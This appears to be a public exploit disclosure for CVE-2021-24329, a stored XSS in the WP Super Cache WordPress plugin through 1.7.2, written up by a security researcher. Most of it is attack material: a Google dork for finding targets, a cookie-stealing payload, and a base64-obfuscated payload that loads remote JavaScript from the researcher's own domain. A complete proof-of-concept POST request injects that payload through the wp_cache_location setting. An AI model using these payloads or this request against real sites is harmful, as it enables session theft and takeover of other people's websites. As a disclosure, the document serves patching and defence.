/*!
- # VULNERABILITY: WP Super Cache WordPress Plugin <= 1.7.2 - Authenticated Persistent XSS
- # GOOGLE DORK: inurl:/wp-content/plugins/wp-super-cache/
- # DATE: 2021-03-23
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Automattic [ https://automattic.com ]
- # SOFTWARE VERSION: <= 1.7.2
- # SOFTWARE LINK: https://ru.wordpress.org/plugins/wp-super-cache/
- # CVSS: AV:N/AC:L/PR:H/UI:R/S:C
- # CWE: CWE-79
- # CVE: CVE-2021-24329
*/



### -- [ Info: ]

[i] An Authenticated Persistent XSS vulnerability was discovered in the WP Super Cache plugin through v1.7.2 for WordPress.

[i] Vulnerable parameter(s): &wp_cache_location=.

[i] This vulnerability also affects other plugins that display diagnostic/debug information and some security plugins.



### -- [ Impact: ]

[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



### -- [ Payloads: ]

[$] ";' onmouseover=alert(document.cookie); style=position:fixed;width:100%;height:100%;margin:0;padding:0;left:0;top:0; 

[$] ";' onmouseover=eval(atob(`eD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0naHR0cHM6Ly9tMHplLnJ1L3BheWxvYWQvYTJyLmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgp`)); style=position:fixed;width:100%;height:100%;margin:0;padding:0;left:0;top:0; 



### -- [ PoC | Authenticated Persistent XSS | Cache Location: ]

[!] POST /wp-admin/options-general.php?page=wpsupercache&tab=settings HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 773
Cookie: [admin cookies]

_wpnonce=c6b9540023&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings&action=scupdates&wp_cache_enabled=1&wp_cache_mod_rewrite=0&wp_cache_not_logged_in=2&cache_rebuild_files=1&wp_cache_location=%2Fvar%2Fwww%2Fexample.com%2Fwp-content%2Fcache%2F%22%3B%27+onmouseover%3Deval%28atob%28%60eD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0naHR0cHM6Ly9tMHplLnJ1L3BheWxvYWQvYTJyLmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgp%60%29%29%3B+style%3Dposition%3Afixed%3Bwidth%3A100%25%3Bheight%3A100%25%3Bmargin%3A0%3Bpadding%3A0%3Bleft%3A0%3Btop%3A0%3B+&_wpnonce=c6b9540023



### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze